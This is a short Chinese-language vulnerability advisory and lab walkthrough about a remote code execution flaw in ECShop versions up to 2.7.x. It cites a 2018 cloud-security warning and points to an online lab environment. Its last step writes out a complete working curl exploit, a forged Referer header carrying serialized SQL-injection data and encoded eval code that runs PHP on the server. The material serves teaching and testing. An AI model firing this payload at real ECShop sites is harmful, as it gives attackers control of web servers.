1. 程式人生 > >漏洞預警 | ECShop 全系列版本遠端程式碼執行高危漏洞

漏洞預警 | ECShop 全系列版本遠端程式碼執行高危漏洞

在這裡插入圖片描述
2018年9月1日,阿里雲態勢感知釋出預警,近日利用ECShop全系列版本的遠端程式碼執行漏洞進行批量化攻擊量呈上升趨勢,該漏洞可直接導致網站伺服器淪陷,黑客可通過WEB攻擊直接獲得伺服器許可權,利用簡單且危害較大。因此,阿里雲安全專家提醒ECShop系統使用者及時進行修復。 —— ECShop全系列版本遠端程式碼執行高危漏洞分析

漏洞分析:
預警| ECShop全系列版本遠端程式碼執行高危漏洞 阿里雲WAF已可防禦
ECShop <= 2.7.x 全系列版本遠端程式碼執行高危漏洞利用

線上實驗地址:
開啟 VULNSPY ECSHOP 實驗環境

漏洞利用

  1. 點選右上方 START TO HACK 按鈕建立 ECShop實驗環境
    在這裡插入圖片描述

  2. 建立完成後開啟 ECSHOP 實驗地址

在這裡插入圖片描述

  1. 傳送 Payload 執行 phpinfo();

將**.vsplate.me換成您的實驗地址*

在終端中執行:

curl http://*.vsplate.me/user.php -d ‘action=login&vulnspy=phpinfo();exit;’ -H ‘Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:“id”;s:3:"’"’"’/";s:3:“num”;s:201:"/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0–";s:4:“name”;s:3:“ads”;}554fcae493e564ee0dc75bdf2ebf94ca’
vulnspy